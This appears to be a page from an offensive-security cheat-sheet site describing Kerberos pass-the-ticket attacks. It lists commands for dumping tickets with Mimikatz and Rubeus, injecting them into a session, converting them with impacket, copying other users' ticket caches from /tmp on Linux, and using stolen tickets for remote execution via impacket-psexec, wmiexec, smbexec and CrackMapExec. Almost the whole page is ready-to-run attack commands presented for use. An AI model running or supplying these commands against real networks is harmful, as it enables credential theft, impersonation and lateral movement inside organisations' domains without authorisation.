Skip to main content

Documentation Index

Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt

Use this file to discover all available pages before exploring further.

Overview

Inject stolen Kerberos ticket (TGT or TGS) into session. No password or hash needed — just the ticket.

Export Tickets — Mimikatz

mimikatz # sekurlsa::tickets /export
Creates .kirbi files in current directory.

Export Tickets — Rubeus

.\Rubeus.exe dump
.\Rubeus.exe dump /luid:0x3e4 /nowrap
.\Rubeus.exe triage                             # List tickets

Inject Ticket — Mimikatz

mimikatz # kerberos::ptt ticket.kirbi
Verify: 
klist

Inject Ticket — Rubeus

.\Rubeus.exe ptt /ticket:BASE64_TICKET
.\Rubeus.exe ptt /ticket:ticket.kirbi

Linux — .ccache Files

Convert .kirbi to .ccache

impacket-ticketConverter ticket.kirbi ticket.ccache

Convert .ccache to .kirbi

impacket-ticketConverter ticket.ccache ticket.kirbi

Use .ccache

export KRB5CCNAME=/path/to/ticket.ccache
impacket-psexec DOMAIN/user@TARGET -k -no-pass
impacket-wmiexec DOMAIN/user@TARGET -k -no-pass
impacket-smbexec DOMAIN/user@TARGET -k -no-pass

Steal Tickets from Linux

ls /tmp/krb5cc_*                     # Default ticket location
cp /tmp/krb5cc_1000 /tmp/stolen.ccache
export KRB5CCNAME=/tmp/stolen.ccache

CrackMapExec with Ticket

export KRB5CCNAME=ticket.ccache
crackmapexec smb TARGET -u user -k

Quick Reference

TaskCommand
Exportmimikatz # sekurlsa::tickets /export
Inject (Win)mimikatz # kerberos::ptt ticket.kirbi
Convertimpacket-ticketConverter file.kirbi file.ccache
Use (Linux)export KRB5CCNAME=file.ccache-k -no-pass
Verifyklist